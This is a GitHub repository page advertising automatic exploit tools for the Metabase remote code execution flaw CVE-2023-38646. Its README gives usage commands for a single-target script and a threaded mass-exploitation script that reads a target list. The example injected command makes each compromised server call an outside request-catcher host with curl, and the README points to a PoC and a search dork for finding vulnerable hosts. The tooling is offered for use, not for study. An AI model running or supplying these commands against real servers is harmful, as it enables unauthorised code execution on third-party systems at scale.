Skip to content
/ CVE-2023-38646 Public

Automatic Tools For Metabase Exploit Known As CVE-2023-38646

28 stars 6 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

robotmikhro/CVE-2023-38646

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits

README.md

README.md

 
 

SS-MASS.png

SS-MASS.png

 
 

SS-SINGLE.png

SS-SINGLE.png

 
 

mass.py

mass.py

 
 

single.py

single.py

 
 

Repository files navigation

CVE-2023-38646

Automatic Tools For Metabase RCE Exploit Known As CVE-2023-38646. Read https://secry.me/explore/news/metabase-rce-cve-2023-38646/ for more information (POC, Dork)

How to Use single.py

CVE-2023-38646-Single Exploit

python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"

or

python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"

How to Use mass.py

CVE-2023-38646-Mass Exploit

python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt

or

python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"

Reference POC

About

Automatic Tools For Metabase Exploit Known As CVE-2023-38646

Resources

Readme
Activity

Stars

28 stars

Watchers

1 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages